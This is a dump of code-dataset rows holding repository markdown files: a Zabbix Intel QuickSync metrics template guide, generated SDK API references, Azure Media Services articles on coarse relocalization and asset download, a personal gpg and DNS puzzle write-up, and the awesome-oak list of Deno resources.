hexsha
stringlengths 40
40
| size
int64 5
1.04M
| ext
stringclasses 6
values | lang
stringclasses 1
value | max_stars_repo_path
stringlengths 3
344
| max_stars_repo_name
stringlengths 5
125
| max_stars_repo_head_hexsha
stringlengths 40
78
| max_stars_repo_licenses
sequencelengths 1
11
| max_stars_count
int64 1
368k
⌀ | max_stars_repo_stars_event_min_datetime
stringlengths 24
24
⌀ | max_stars_repo_stars_event_max_datetime
stringlengths 24
24
⌀ | max_issues_repo_path
stringlengths 3
344
| max_issues_repo_name
stringlengths 5
125
| max_issues_repo_head_hexsha
stringlengths 40
78
| max_issues_repo_licenses
sequencelengths 1
11
| max_issues_count
int64 1
116k
⌀ | max_issues_repo_issues_event_min_datetime
stringlengths 24
24
⌀ | max_issues_repo_issues_event_max_datetime
stringlengths 24
24
⌀ | max_forks_repo_path
stringlengths 3
344
| max_forks_repo_name
stringlengths 5
125
| max_forks_repo_head_hexsha
stringlengths 40
78
| max_forks_repo_licenses
sequencelengths 1
11
| max_forks_count
int64 1
105k
⌀ | max_forks_repo_forks_event_min_datetime
stringlengths 24
24
⌀ | max_forks_repo_forks_event_max_datetime
stringlengths 24
24
⌀ | content
stringlengths 5
1.04M
| avg_line_length
float64 1.14
851k
| max_line_length
int64 1
1.03M
| alphanum_fraction
float64 0
1
| lid
stringclasses 191
values | lid_prob
float64 0.01
1
|
---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
e0366a163ff0588263286b53c4b911741d46cf57 | 71 | md | Markdown | README.md | wallbasher/SmartPiGarageDoor | 84bd1389f03ccd6c3bcfcd45089eeeae2877bada | [
"Apache-2.0"
] | null | null | null | README.md | wallbasher/SmartPiGarageDoor | 84bd1389f03ccd6c3bcfcd45089eeeae2877bada | [
"Apache-2.0"
] | null | null | null | README.md | wallbasher/SmartPiGarageDoor | 84bd1389f03ccd6c3bcfcd45089eeeae2877bada | [
"Apache-2.0"
] | null | null | null | # SmartPiGarageDoor
SmartThings integration of Rasberry PI Garage Door
| 23.666667 | 50 | 0.859155 | kor_Hang | 0.547487 |
e03856ae05078a33a85a6cc928abf2eceb944cba | 1,244 | md | Markdown | code/dotnet/SecuritizedDerivativesAPIforDigitalPortals/v2/docs/InlineResponse2005DataLifeCycle.md | factset/enterprise-sdk | 3fd4d1360756c515c9737a0c9a992c7451d7de7e | [
"Apache-2.0"
] | 6 | 2022-02-07T16:34:18.000Z | 2022-03-30T08:04:57.000Z | code/dotnet/SecuritizedDerivativesAPIforDigitalPortals/v2/docs/InlineResponse2005DataLifeCycle.md | factset/enterprise-sdk | 3fd4d1360756c515c9737a0c9a992c7451d7de7e | [
"Apache-2.0"
] | 2 | 2022-02-07T05:25:57.000Z | 2022-03-07T14:18:04.000Z | code/dotnet/SecuritizedDerivativesAPIforDigitalPortals/v2/docs/InlineResponse2005DataLifeCycle.md | factset/enterprise-sdk | 3fd4d1360756c515c9737a0c9a992c7451d7de7e | [
"Apache-2.0"
] | null | null | null | # FactSet.SDK.SecuritizedDerivativesAPIforDigitalPortals.Model.InlineResponse2005DataLifeCycle
Values and value ranges related to important dates.
## Properties
Name | Type | Description | Notes
------------ | ------------- | ------------- | -------------
**Issue** | [**InlineResponse2005DataLifeCycleIssue**](InlineResponse2005DataLifeCycleIssue.md) | | [optional]
**Maturity** | [**InlineResponse2005DataLifeCycleMaturity**](InlineResponse2005DataLifeCycleMaturity.md) | | [optional]
**Callable** | [**List<InlineResponse2005DataLifeCycleMaturityPerpetual>**](InlineResponse2005DataLifeCycleMaturityPerpetual.md) | Indicates whether callable and non-callable securitized derivatives are among the results. A callable securitized derivative is one that may be redeemed by the issuer prior to maturity. | [optional]
**Valuation** | [**InlineResponse2005DataLifeCycleValuation**](InlineResponse2005DataLifeCycleValuation.md) | | [optional]
**Repayment** | [**InlineResponse2005DataLifeCycleRepayment**](InlineResponse2005DataLifeCycleRepayment.md) | | [optional]
[[Back to Model list]](../README.md#documentation-for-models) [[Back to API list]](../README.md#documentation-for-api-endpoints) [[Back to README]](../README.md)
| 77.75 | 336 | 0.754019 | yue_Hant | 0.464291 |
e038c3d1a9220ec826d82e1b2c5b7c5580a9d33e | 3,181 | md | Markdown | articles/spatial-anchors/how-tos/set-up-coarse-reloc-unity.md | changeworld/azure-docs.hu-hu | f0a30d78dd2458170473188ccce3aa7e128b7f89 | [
"CC-BY-4.0",
"MIT"
] | null | null | null | articles/spatial-anchors/how-tos/set-up-coarse-reloc-unity.md | changeworld/azure-docs.hu-hu | f0a30d78dd2458170473188ccce3aa7e128b7f89 | [
"CC-BY-4.0",
"MIT"
] | null | null | null | articles/spatial-anchors/how-tos/set-up-coarse-reloc-unity.md | changeworld/azure-docs.hu-hu | f0a30d78dd2458170473188ccce3aa7e128b7f89 | [
"CC-BY-4.0",
"MIT"
] | null | null | null | ---
title: Durva újrahonosítás az egységben
description: Részletesen ismerteti, hogyan hozhatók létre és találhatók a durva újrahonosítást használó horgonyok C#a alkalmazásban.
author: bucurb
manager: dacoghl
services: azure-spatial-anchors
ms.author: bobuc
ms.date: 09/19/2019
ms.topic: tutorial
ms.service: azure-spatial-anchors
ms.openlocfilehash: 5c976bd020d37672c44c89113bf7786e1ccf141b
ms.sourcegitcommit: 87781a4207c25c4831421c7309c03fce5fb5793f
ms.translationtype: MT
ms.contentlocale: hu-HU
ms.lasthandoff: 01/23/2020
ms.locfileid: "76548254"
---
# <a name="how-to-create-and-locate-anchors-using-coarse-relocalization-in-c"></a>A durva újrahonosítást használó horgonyok létrehozása és megkereséseC#
> [!div class="op_single_selector"]
> * [Unity](set-up-coarse-reloc-unity.md)
> * [Objective-C](set-up-coarse-reloc-objc.md)
> * [Swift](set-up-coarse-reloc-swift.md)
> * [Android Java](set-up-coarse-reloc-java.md)
> * [C++/NDK](set-up-coarse-reloc-cpp-ndk.md)
> * [C++/WinRT](set-up-coarse-reloc-cpp-winrt.md)
Az Azure térbeli horgonyok a létrehozott horgonyokkal társíthatók az eszközön, a helymeghatározási érzékelőkkel. Ezzel az adattal gyorsan megállapítható, hogy vannak-e az eszköz közelében horgonyok. További információ: [durva újrahonosítás](../concepts/coarse-reloc.md).
## <a name="prerequisites"></a>Előfeltételek
Az útmutató elvégzéséhez győződjön meg arról, hogy rendelkezik a következővel:
- Az C#alapszintű ismerete.
- Olvassa el az [Azure térbeli horgonyok áttekintése című témakört](../overview.md).
- Az [5 perces rövid](../index.yml)útmutatók egyikét fejezte be.
- Olvassa el a [create (létrehozás), majd a horgonyok megkeresése című témakört](../create-locate-anchors-overview.md).
[!INCLUDE [Configure Provider](../../../includes/spatial-anchors-set-up-coarse-reloc-configure-provider.md)]
```csharp
// Create the sensor fingerprint provider
PlatformLocationProvider sensorProvider = new PlatformLocationProvider();
// Allow GPS
sensorProvider.Sensors.GeoLocationEnabled = true;
// Allow WiFi scanning
sensorProvider.Sensors.WifiEnabled = true;
// Allow a set of known BLE beacons
sensorProvider.Sensors.BluetoothEnabled = true;
sensorProvider.Sensors.KnownBeaconProximityUuids = new[]
{
"22e38f1a-c1b3-452b-b5ce-fdb0f39535c1",
"a63819b9-8b7b-436d-88ec-ea5d8db2acb0",
. . .
};
```
[!INCLUDE [Configure Provider](../../../includes/spatial-anchors-set-up-coarse-reloc-configure-session.md)]
```csharp
// Set the session's sensor fingerprint provider
cloudSpatialAnchorSession.LocationProvider = sensorProvider;
// Configure the near-device criteria
NearDeviceCriteria nearDeviceCriteria = new NearDeviceCriteria();
nearDeviceCriteria.DistanceInMeters = 5;
nearDeviceCriteria.MaxResultCount = 25;
// Set the session's locate criteria
AnchorLocateCriteria anchorLocateCriteria = new AnchorLocateCriteria();
anchorLocateCriteria.NearDevice = nearDeviceCriteria;
cloudSpatialAnchorSession.CreateWatcher(anchorLocateCriteria);
```
[!INCLUDE [Locate](../../../includes/spatial-anchors-create-locate-anchors-locating-events.md)]
[!INCLUDE [Configure Provider](../../../includes/spatial-anchors-set-up-coarse-reloc-next-steps.md)] | 39.7625 | 270 | 0.782458 | hun_Latn | 0.878053 |
e038de3e8b543f32f8610c80c73bea477da2dc1f | 9,447 | md | Markdown | tutorials/basic-components/go/director/swagger/docs/DeploymentsApi.md | edgegap/open-match | be45c1030cbabd2dd37b797e25f235ffb3e14b22 | [
"MIT"
] | null | null | null | tutorials/basic-components/go/director/swagger/docs/DeploymentsApi.md | edgegap/open-match | be45c1030cbabd2dd37b797e25f235ffb3e14b22 | [
"MIT"
] | null | null | null | tutorials/basic-components/go/director/swagger/docs/DeploymentsApi.md | edgegap/open-match | be45c1030cbabd2dd37b797e25f235ffb3e14b22 | [
"MIT"
] | null | null | null | # \DeploymentsApi
All URIs are relative to *https://localhost*
Method | HTTP request | Description
------------- | ------------- | -------------
[**ContextGet**](DeploymentsApi.md#ContextGet) | **Get** /v1/context/{request_id}/{security_number} | Allow to get the Context of a deployment
[**Deploy**](DeploymentsApi.md#Deploy) | **Post** /v1/deploy | Allow to deploy a new Instance of an App
[**DeploymentDelete**](DeploymentsApi.md#DeploymentDelete) | **Delete** /v1/stop/{request_id} | Allow to stop an instance for the client
[**DeploymentGetLogs**](DeploymentsApi.md#DeploymentGetLogs) | **Get** /v1/deployment/{request_id}/container-logs | Allow to get the Container Logs of a Deployment
[**DeploymentStatusGet**](DeploymentsApi.md#DeploymentStatusGet) | **Get** /v1/status/{request_id} | Allow to get The current status of a request
[**DeploymentsGet**](DeploymentsApi.md#DeploymentsGet) | **Get** /v1/deployments | Allow to get the List of Deployments
[**SelfDeploymentDelete**](DeploymentsApi.md#SelfDeploymentDelete) | **Delete** /v1/self/stop/{request_id}/{access_point_id} | Allow to stop an instance for the client from inside a container
# **ContextGet**
> Deployment ContextGet(ctx, requestId, securityNumber, authorization)
Allow to get the Context of a deployment
Request Deployment Context Info You should use this URL inside your deployment. The URL is injected in your deployment and can be found via the environment variable named ARBITRIUM_CONTEXT_URL
### Required Parameters
Name | Type | Description | Notes
------------- | ------------- | ------------- | -------------
**ctx** | **context.Context** | context for authentication, logging, cancellation, deadlines, tracing, etc.
**requestId** | **string**| Unique Identifier to keep track of your request across all Arbitrium ecosystem. |
**securityNumber** | **int32**| Random Security number generate to validate the request id. |
**authorization** | **string**| Auto Generated token. This token is injected in your deployment and can be found via the environment variable named ARBITRIUM_CONTEXT_TOKEN |
### Return type
[**Deployment**](Deployment.md)
### Authorization
No authorization required
### HTTP request headers
- **Content-Type**: application/json
- **Accept**: application/json
[[Back to top]](#) [[Back to API list]](../README.md#documentation-for-api-endpoints) [[Back to Model list]](../README.md#documentation-for-models) [[Back to README]](../README.md)
# **Deploy**
> Request Deploy(ctx, payload)
Allow to deploy a new Instance of an App
Deploy an Application
### Required Parameters
Name | Type | Description | Notes
------------- | ------------- | ------------- | -------------
**ctx** | **context.Context** | context for authentication, logging, cancellation, deadlines, tracing, etc.
**payload** | [**DeployModel**](DeployModel.md)| |
### Return type
[**Request**](Request.md)
### Authorization
[apikey](../README.md#apikey)
### HTTP request headers
- **Content-Type**: application/json
- **Accept**: application/json
[[Back to top]](#) [[Back to API list]](../README.md#documentation-for-api-endpoints) [[Back to Model list]](../README.md#documentation-for-models) [[Back to README]](../README.md)
# **DeploymentDelete**
> Delete DeploymentDelete(ctx, requestId, optional)
Allow to stop an instance for the client
Delete a deployment
### Required Parameters
Name | Type | Description | Notes
------------- | ------------- | ------------- | -------------
**ctx** | **context.Context** | context for authentication, logging, cancellation, deadlines, tracing, etc.
**requestId** | **string**| Unique Identifier to keep track of your request across all Arbitrium ecosystem. It's included in the response of the app deploy, example: 93924761ccde |
**optional** | ***DeploymentsApiDeploymentDeleteOpts** | optional parameters | nil if no parameters
### Optional Parameters
Optional parameters are passed through a pointer to a DeploymentsApiDeploymentDeleteOpts struct
Name | Type | Description | Notes
------------- | ------------- | ------------- | -------------
**containerLogStorage** | **optional.String**| If you want to enable the container log storage for the deployment. You can put 'true' if you already have endpoint storage associated with your deployment's app version. You can put 'false' if it is enabled by default and you want to disable it for this specific request. Or you can put the name of your endpoint storage and if it is valid we will store the container logs. |
### Return type
[**Delete**](Delete.md)
### Authorization
[apikey](../README.md#apikey)
### HTTP request headers
- **Content-Type**: application/json
- **Accept**: application/json
[[Back to top]](#) [[Back to API list]](../README.md#documentation-for-api-endpoints) [[Back to Model list]](../README.md#documentation-for-models) [[Back to README]](../README.md)
# **DeploymentGetLogs**
> DeploymentLogs DeploymentGetLogs(ctx, requestId)
Allow to get the Container Logs of a Deployment
Get a deployment container log.
### Required Parameters
Name | Type | Description | Notes
------------- | ------------- | ------------- | -------------
**ctx** | **context.Context** | context for authentication, logging, cancellation, deadlines, tracing, etc.
**requestId** | **string**| |
### Return type
[**DeploymentLogs**](DeploymentLogs.md)
### Authorization
[apikey](../README.md#apikey)
### HTTP request headers
- **Content-Type**: application/json
- **Accept**: application/json
[[Back to top]](#) [[Back to API list]](../README.md#documentation-for-api-endpoints) [[Back to Model list]](../README.md#documentation-for-models) [[Back to README]](../README.md)
# **DeploymentStatusGet**
> Status DeploymentStatusGet(ctx, requestId)
Allow to get The current status of a request
Get Deployment Request status
### Required Parameters
Name | Type | Description | Notes
------------- | ------------- | ------------- | -------------
**ctx** | **context.Context** | context for authentication, logging, cancellation, deadlines, tracing, etc.
**requestId** | **string**| Unique Identifier to keep track of your request across all Arbitrium ecosystem. It's included in the response of the app deploy, example: 93924761ccde |
### Return type
[**Status**](Status.md)
### Authorization
[apikey](../README.md#apikey)
### HTTP request headers
- **Content-Type**: application/json
- **Accept**: application/json
[[Back to top]](#) [[Back to API list]](../README.md#documentation-for-api-endpoints) [[Back to Model list]](../README.md#documentation-for-models) [[Back to README]](../README.md)
# **DeploymentsGet**
> Deployments DeploymentsGet(ctx, )
Allow to get the List of Deployments
Get All Deployments
### Required Parameters
This endpoint does not need any parameter.
### Return type
[**Deployments**](Deployments.md)
### Authorization
[apikey](../README.md#apikey)
### HTTP request headers
- **Content-Type**: application/json
- **Accept**: application/json
[[Back to top]](#) [[Back to API list]](../README.md#documentation-for-api-endpoints) [[Back to Model list]](../README.md#documentation-for-models) [[Back to README]](../README.md)
# **SelfDeploymentDelete**
> Delete SelfDeploymentDelete(ctx, requestId, accessPointId, authorization, optional)
Allow to stop an instance for the client from inside a container
Self Delete a deployment You should use this URL inside your deployment. The URL is injected in your deployment and can be found via the environment variable named ARBITRIUM_DELETE_URL
### Required Parameters
Name | Type | Description | Notes
------------- | ------------- | ------------- | -------------
**ctx** | **context.Context** | context for authentication, logging, cancellation, deadlines, tracing, etc.
**requestId** | **string**| Unique Identifier to keep track of your request across all Arbitrium ecosystem. It's included in the response of the app deploy, example: 93924761ccde |
**accessPointId** | **int32**| Access Point Number provided by our system |
**authorization** | **string**| Auto Generated token. This token is injected in your deployment and can be found via the environment variable named ARBITRIUM_DELETE_TOKEN |
**optional** | ***DeploymentsApiSelfDeploymentDeleteOpts** | optional parameters | nil if no parameters
### Optional Parameters
Optional parameters are passed through a pointer to a DeploymentsApiSelfDeploymentDeleteOpts struct
Name | Type | Description | Notes
------------- | ------------- | ------------- | -------------
**containerLogStorage** | **optional.String**| If you want to enable the container log storage for the deployment. You can put 'true' if you already have endpoint storage associated with your deployment's app version. You can put 'false' if it is enabled by default and you want to disable it for this specific request. Or you can put the name of your endpoint storage and if it is valid we will store the container logs. |
### Return type
[**Delete**](Delete.md)
### Authorization
No authorization required
### HTTP request headers
- **Content-Type**: application/json
- **Accept**: application/json
[[Back to top]](#) [[Back to API list]](../README.md#documentation-for-api-endpoints) [[Back to Model list]](../README.md#documentation-for-models) [[Back to README]](../README.md)
| 40.719828 | 445 | 0.688155 | eng_Latn | 0.834744 |
e038fc372380f11a8fbd6722cf92063ee08d97e1 | 3,629 | md | Markdown | articles/media-services/previous/media-services-deliver-asset-download.md | cedarkuo/azure-docs.zh-tw | 35578e41dc1bd28a8859b2dcc02f71c8c5b26f90 | [
"CC-BY-4.0",
"MIT"
] | null | null | null | articles/media-services/previous/media-services-deliver-asset-download.md | cedarkuo/azure-docs.zh-tw | 35578e41dc1bd28a8859b2dcc02f71c8c5b26f90 | [
"CC-BY-4.0",
"MIT"
] | null | null | null | articles/media-services/previous/media-services-deliver-asset-download.md | cedarkuo/azure-docs.zh-tw | 35578e41dc1bd28a8859b2dcc02f71c8c5b26f90 | [
"CC-BY-4.0",
"MIT"
] | null | null | null | ---
title: 將媒體服務資產下載到您的電腦 - Azure | Microsoft Docs
description: 了解如何將資產下載到您的電腦。 程式碼範例以 C# 撰寫,並使用 Media Services SDK for .NET。
services: media-services
documentationcenter: ''
author: juliako
manager: femila
editor: ''
ms.assetid: 8908a1dd-3ffb-4f18-955d-4c8e2d82fc5d
ms.service: media-services
ms.workload: media
ms.tgt_pltfrm: na
ms.devlang: na
ms.topic: article
ms.date: 03/18/2019
ms.author: juliako
ms.openlocfilehash: 21fcc6ae09718ffbb22e1d438926586dd3cde71d
ms.sourcegitcommit: be32c9a3f6ff48d909aabdae9a53bd8e0582f955
ms.translationtype: MT
ms.contentlocale: zh-TW
ms.lasthandoff: 04/26/2020
ms.locfileid: "61465655"
---
# <a name="how-to-deliver-an-asset-by-download"></a>如何:透過下載傳遞資產
本文將討論有哪些選項可傳遞已上傳至媒體服務的媒體資產。 您可以透過多種應用程式案例來傳遞媒體服務內容。 編碼之後,下載所產生的媒體資產,或使用串流定位器來存取它們。 若要改善效能和延展性,您也可以使用內容傳遞網路 (CDN) 傳遞內容。
這個範例示範如何從媒體服務下載媒體資產到本機電腦。 程式碼會以工作 ID 查詢與媒體服務帳戶相關聯的工作,並存取其 **OutputMediaAssets** 集合 (這是執行工作後所產生的一或多個輸出媒體資產)。 此範例將說明如何從工作下載輸出媒體資產,但您也可以用相同的方式來下載其他資產。
>[!NOTE]
>對於不同的 AMS 原則 (例如 Locator 原則或 ContentKeyAuthorizationPolicy) 有 1,000,000 個原則的限制。 如果您一律使用相同的日期 / 存取權限 (例如要長時間維持就地的定位器原則 (非上載原則)),請使用相同的原則識別碼。 如需詳細資訊,請參閱[這](media-services-dotnet-manage-entities.md#limit-access-policies)篇文章。
```csharp
// Download the output asset of the specified job to a local folder.
static IAsset DownloadAssetToLocal( string jobId, string outputFolder)
{
// This method illustrates how to download a single asset.
// However, you can iterate through the OutputAssets
// collection, and download all assets if there are many.
// Get a reference to the job.
IJob job = GetJob(jobId);
// Get a reference to the first output asset. If there were multiple
// output media assets you could iterate and handle each one.
IAsset outputAsset = job.OutputMediaAssets[0];
// Create a SAS locator to download the asset
IAccessPolicy accessPolicy = _context.AccessPolicies.Create("File Download Policy", TimeSpan.FromDays(30), AccessPermissions.Read);
ILocator locator = _context.Locators.CreateLocator(LocatorType.Sas, outputAsset, accessPolicy);
BlobTransferClient blobTransfer = new BlobTransferClient
{
NumberOfConcurrentTransfers = 20,
ParallelTransferThreadCount = 20
};
var downloadTasks = new List<Task>();
foreach (IAssetFile outputFile in outputAsset.AssetFiles)
{
// Use the following event handler to check download progress.
outputFile.DownloadProgressChanged += DownloadProgress;
string localDownloadPath = Path.Combine(outputFolder, outputFile.Name);
Console.WriteLine("File download path: " + localDownloadPath);
downloadTasks.Add(outputFile.DownloadAsync(Path.GetFullPath(localDownloadPath), blobTransfer, locator, CancellationToken.None));
outputFile.DownloadProgressChanged -= DownloadProgress;
}
Task.WaitAll(downloadTasks.ToArray());
return outputAsset;
}
static void DownloadProgress(object sender, DownloadProgressChangedEventArgs e)
{
Console.WriteLine(string.Format("{0} % download progress. ", e.Progress));
}
```
## <a name="media-services-learning-paths"></a>媒體服務學習路徑
[!INCLUDE [media-services-learning-paths-include](../../../includes/media-services-learning-paths-include.md)]
## <a name="provide-feedback"></a>提供意見反應
[!INCLUDE [media-services-user-voice-include](../../../includes/media-services-user-voice-include.md)]
## <a name="see-also"></a>另請參閱
[傳遞串流內容](media-services-deliver-streaming-content.md)
| 39.021505 | 222 | 0.726646 | yue_Hant | 0.715099 |
e0396df153c1c6d0eed9493eefaabf04c9d3fd4a | 3,176 | md | Markdown | Server_Hardware/Intel/template_intel_quicksync_gpu_metrics/5.0/README.md | SkyBeam/community-templates | 634b1a79f4da224b0066880ec76a8b57bdf51257 | [
"MIT"
] | 291 | 2021-11-25T15:32:30.000Z | 2022-03-28T19:41:28.000Z | Server_Hardware/Intel/template_intel_quicksync_gpu_metrics/5.0/README.md | SkyBeam/community-templates | 634b1a79f4da224b0066880ec76a8b57bdf51257 | [
"MIT"
] | 48 | 2021-11-25T14:41:21.000Z | 2022-03-31T07:37:02.000Z | Server_Hardware/Intel/template_intel_quicksync_gpu_metrics/5.0/README.md | SkyBeam/community-templates | 634b1a79f4da224b0066880ec76a8b57bdf51257 | [
"MIT"
] | 296 | 2021-11-25T12:54:15.000Z | 2022-03-31T14:38:37.000Z | # Intel QuickSync GPU metrics
## Overview
There is template for monitoring (QuickSync)integrated video in Intel processors:
You can monitor theese parameters:
Multi-Format Codec Engine (also known as “MFX” or “VDBOX”); Video Encode (PAK) and Decode
2nd instance of the MultiFormat Codec Engine, if available (Examples of supported processor include 5th generation of Intel® Core™ processors with Intel® HD Graphics 6000, Intel® Iris™ Graphics 6100, Intel® Iris™ Pro Graphics 6200, Intel® Iris™ Pro Graphics P6300); Video Encode (PAK) and Decode
Video Quality Engine (also known as “VEBOX” or Video Quality enhancement pipeline) Deinterlace, Denoise
Render Engine (Execution units, media samplers, VME and their caches) Video Encode (ENC), OpenCL, Video Scaling, VPP Composition including frame rate conversion and image stabilization, VPP copy to CPU
GT Frequency
First of all, you need prepare utility for getting parameters.
You need build metrics\_monitor from repo: https://github.com/Intel-Media-SDK/MediaSDK
For correct working you may need add line 'run = 0;' at the end of 'while' in cttmetrics\_sample.cpp
while(run)
...
if (true == isFreq)
printf("\tGT Freq: %4.2f", metric\_values[3]);
printf("\n");
run = 0
}
Add rules to sudoers:
Defaults:zabbix !requiretty
zabbix ALL=(ALL) NOPASSWD: /opt/intel/mediasdk/tools/metrics\_monitor/\_bin/metrics\_monitor
And add needed userparameter in zabbix-agent:
UserParameter=gpu.metrics[*],sudo /opt/intel/mediasdk/tools/metrics\_monitor/\_bin/metrics\_monitor "$2" "$3" | sed 's/ usage://g' | sed 's/\t/\n/g' | sed 's/,//g' | sed 's/T F/T\_F/g' | grep "$1" | awk '{print $ 2}'
## Author
Kirill Savin
## Macros used
There are no macros links in this template.
## Template links
There are no template links in this template.
## Discovery rules
There are no discovery rules in this template.
## Items collected
|Name|Description|Type|Key and additional info|
|----|-----------|----|----|
|$1 usage|<p>Multi-Format Codec Engine (also known as “MFX” or “VDBOX”) Video Encode (PAK) and Decode</p>|`Zabbix agent`|gpu.metrics["VIDEO ",100,500]<p>Update: 30s</p>|
|$1 usage|<p>Video Quality Engine (also known as “VEBOX” or Video Quality enhancement pipeline) Deinterlace, Denoise</p>|`Zabbix agent`|gpu.metrics["VIDEO_E",100,500]<p>Update: 30s</p>|
|$1 usage|<p>2nd instance of the MultiFormat Codec Engine, if available (Examples of supported processor include 5th generation of Intel® Core™ processors with Intel® HD Graphics 6000, Intel® Iris™ Graphics 6100, Intel® Iris™ Pro Graphics 6200, Intel® Iris™ Pro Graphics P6300) Video Encode (PAK) and Decode</p>|`Zabbix agent`|gpu.metrics["VIDEO2",100,500]<p>Update: 30s</p>|
|$1 usage|<p>Render Engine (Execution units, media samplers, VME and their caches) Video Encode (ENC), OpenCL, Video Scaling, VPP Composition including frame rate conversion and image stabilization, VPP copy to CPU</p>|`Zabbix agent`|gpu.metrics["RENDER",100,500]<p>Update: 30s</p>|
|$1 usage|<p>GT Freq</p>|`Zabbix agent`|gpu.metrics["GT_Freq",100,500]<p>Update: 30s</p>|
## Triggers
There are no triggers in this template.
| 26.915254 | 375 | 0.724811 | eng_Latn | 0.759837 |
e03993a1dc452ae7f9bbae4c08c9c4d5b7feb08e | 134 | md | Markdown | docs/modules/__tests___variants.md | nju33/tailwindcss-fa-i2svg-variants | 3a69b8f2e374c186efa07fd1a3801f5cd64c40ba | [
"MIT"
] | null | null | null | docs/modules/__tests___variants.md | nju33/tailwindcss-fa-i2svg-variants | 3a69b8f2e374c186efa07fd1a3801f5cd64c40ba | [
"MIT"
] | null | null | null | docs/modules/__tests___variants.md | nju33/tailwindcss-fa-i2svg-variants | 3a69b8f2e374c186efa07fd1a3801f5cd64c40ba | [
"MIT"
] | null | null | null | [tailwindcss-fa-svg-loading-variants](../README.md) / [Exports](../modules.md) / __tests__/variants
# Module: \_\_tests\_\_/variants
| 33.5 | 99 | 0.708955 | yue_Hant | 0.300021 |
e039c1c32f93116011b52fe9527f2fbba3333cf6 | 562 | md | Markdown | README.md | MissREM/BookingAPI | aafc4be711c144a000853a8e9ccff21fa3f3f4c9 | [
"MIT"
] | null | null | null | README.md | MissREM/BookingAPI | aafc4be711c144a000853a8e9ccff21fa3f3f4c9 | [
"MIT"
] | null | null | null | README.md | MissREM/BookingAPI | aafc4be711c144a000853a8e9ccff21fa3f3f4c9 | [
"MIT"
] | null | null | null | # BookingAPI
A little exercise about API's
WARNING
=======
The following exercise it's just a personal experiment that I would like to keep private, but, you know, **this humble princess can't affort 5 aussie golden coins a month**, so this is my *__disclaimer of liability__*:
The humble code that you find in this repo may not help anybody with anything in particular, it may not be my own code, so it may contain somebody elses code and as you may guess, It may have really horrible mistakes, typos and bad programming practices.
:information_desk_person:
| 51.090909 | 254 | 0.77758 | eng_Latn | 0.999559 |
e039df3de3ec375aaccb9856348e60d2217b379a | 1,891 | md | Markdown | README.md | mar-0ne/badr-challenge | 7016b2d1d15108ddf3d91d2bc7cdd30dce1099ef | [
"MIT"
] | null | null | null | README.md | mar-0ne/badr-challenge | 7016b2d1d15108ddf3d91d2bc7cdd30dce1099ef | [
"MIT"
] | null | null | null | README.md | mar-0ne/badr-challenge | 7016b2d1d15108ddf3d91d2bc7cdd30dce1099ef | [
"MIT"
] | null | null | null | # badr-challenge
### A friend of mine wrote a challenge for me. I'm solving it here :)
1 **first step**</br> He asked me to generate a pair of GPG keys and send the public key to him. </br>
`$ gpg --full-generate-key` </br>
2 **second step**</br> He sent to me an Image: </br>
Well, that image was containing a text inside of it, he wrote int the instructions that I should get that text: </br>
`$ cat black.hole` </br>
3 **third step**</br>
The text is: *Follow the txt in the* [marone.pythops.com](https://marone.pythops.com) </br>
if you go to that URL in the browser it's not going to work! that's the trick cause he meant by *follow the txt* to check the value of the TXT DNS record !!! </br>
`$ dig -t txt marone.pythops.com` </br>
the value of the TXT record is: *"aHR0cDovL3hscWlxenlid2FxN3NlbWliNXRxNGlkejc0bGdzcGx5czI1Mmdlb3ozdTdnZ3M3a3Z1bWV1NXFkLm9uaW9uL2NoYWxsZW5nZQ=="* </br>
4 **fourth step**</br>
well, this is a base64 string so I need to convert it to text: </br>
`$ echo aHR0cDovL3hscWlxenlid2FxN3NlbWliNXRxNGlkejc0bGdzcGx5czI1Mmdlb3ozdTdnZ3M3a3Z1bWV1NXFkLm9uaW9uL2NoYWxsZW5nZQ== | base64 --decode` </br>
5 **fifth step**</br>
once again the output is a URL: [it a .onion link !](http://xlqiqzybwaq7semib5tq4idz74lgsplys252geoz3u7ggs7kvumeu5qd.onion/challenge) which means I should install [Tor browser](https://www.torproject.org/download/) in order to open that link. </br> By going to that link I got a file to downlod, after downloading it, I figured out that it is encrypted, that's why he asked me to generate the GPG key. </br>I decrypted the file: </br>
`$ gpg --output doc --decrypt challenge` </br>
the text in the file i: *Build an API that returns the public IPv4 or IPv6. So people can know easily their public IPs* which is the final step.
6 **sixth step**</br> building the API
| 52.527778 | 434 | 0.734003 | eng_Latn | 0.98381 |
e03a1c1af2b5fe4875ec870b47d0ec4359284e7e | 1,945 | md | Markdown | README.md | asad-mlbd/awesome-oak | 834c9347b3ea45b3441acce6395e8f38a4c77776 | [
"MIT"
] | null | null | null | README.md | asad-mlbd/awesome-oak | 834c9347b3ea45b3441acce6395e8f38a4c77776 | [
"MIT"
] | null | null | null | README.md | asad-mlbd/awesome-oak | 834c9347b3ea45b3441acce6395e8f38a4c77776 | [
"MIT"
] | null | null | null | ## awesome-oak
This is a list of community projects related to [oak](https://oakserver.github.io/oak/) middleware and router server framework for Deno.
If you know of resources that would be great to list here, just create a [pull request](https://github.com/oakserver/awesome-oak/pulls).
### Getting Started
- [Official Site](https://oakserver.github.io/oak/)
### Middleware
- [oak_middleware](https://oakserver.github.io/middleware/) a collection of maintained middleware for oak.
- [view-engine](https://github.com/deligenius/view-engine) 🚀a Template View Engine for Deno frameworks.
- [multiparser](https://github.com/deligenius/multiparser) a Deno module for parsing multipart/form-data.
- [error handling & logging](https://github.com/halvardssm/oak-middleware-error-logger) a error handling middleware with logger.
- [jwt](https://github.com/halvardssm/oak-middleware-jwt) a JWT validation middleware.
- [session](https://github.com/denjucks/session) a session middleware for oak with Redis support.
- [organ](https://github.com/denjucks/organ) a logging middleware based on the morgan middleware from ExpressJS.
- [snelm](https://github.com/denjucks/snelm) a security middleware ported from the helmet middleware from ExpressJS.
- [validator](https://github.com/halvardssm/oak-middleware-validator) a validator for body content and url parameters.
- [upload](https://github.com/hviana/Upload-middleware-for-Oak-Deno-framework) perform uploads, organize uploads to avoid file system problems and create dirs if not exists, perform validations and optimizes RAM usage when uploading large files using Deno standard libraries.
### Examples/Templates/Boilerplates
- [deno_crud_jwt](https://github.com/22mahmoud/deno_crud_jwt) 🦕 basic jwt implementation with CRUD operations using oak + postgres.
### Testing
- [superoak](https://github.com/asos-craigmorten/superoak) HTTP assertions for Oak made easy via SuperDeno.
### Tutorials
| 58.939394 | 275 | 0.779949 | eng_Latn | 0.684739 |
